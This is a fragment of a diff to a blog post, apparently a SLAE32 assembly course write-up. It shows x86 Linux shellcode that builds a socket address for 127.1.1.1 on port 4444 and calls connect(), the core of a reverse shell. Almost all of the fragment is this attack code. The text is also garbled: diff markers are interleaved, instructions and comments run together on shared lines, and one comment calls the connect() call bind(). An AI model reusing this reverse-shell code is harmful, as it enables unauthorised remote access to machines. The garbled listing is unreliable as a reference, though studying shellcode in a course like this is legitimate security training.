boku7/boku7.github.io/_posts/2019-09-02-SLAE32_2_ReverseShell.md

 push 0x0101017f   ; ARG[2]. sin_addr.s_addr: 127.1.1.1 (big endian)
 push word 0x3905  ; ARG[1].
 This is for the TCP Port 4444.
 push bx           ; ARG[0].
-Push the value 2 onto the stack, needed for AF_INET. mov ecx, esp      ; Now all that is left is to point ECX to the top of the loaded stack and let it do it's thing.
+Push the value 2 onto the stack, needed for AF_INET. mov ecx, esp      ; Now all that is left is to point ECX to the top of the
+                  ;  loaded stack and let it do it's thing.

 push 0x10         ; ECX[2] - socklen_t addrlen // Sizeof sockaddr
 push ecx          ; ECX[1] - const struct sockaddr *addr // pointer to sockaddr
-push esi          ; ECX[0] - int sockfd // Saved in ESI earlier after creating the socket.
+push esi          ; ECX[0] - int sockfd.
+Saved in ESI earlier after creating the socket.

-mov ecx, esp      ; Stack is all loaded.
-We now need to point ECX to the top of the Stack. inc ebx	          ; Connect() value for the socketcall() SYSCAL mov al, 0x66      ; socketcall() system call int 0x80          ; System Call Interrupt 0x80 - Executes bind().
-Connecting our Socket to the TCP-IP Address. xchg ebx, esi
+mov ecx, esp      ; Stack is loaded.
+We now need to point ECX to the top of the Stack. inc ebx	          ; Connect() value for the socketcall() SYSCAL mov al, 0x66      ; socketcall() system call int 0x80          ; System Call Interrupt 0x80 - Executes bind(). xchg ebx, esi

 xor ecx, ecx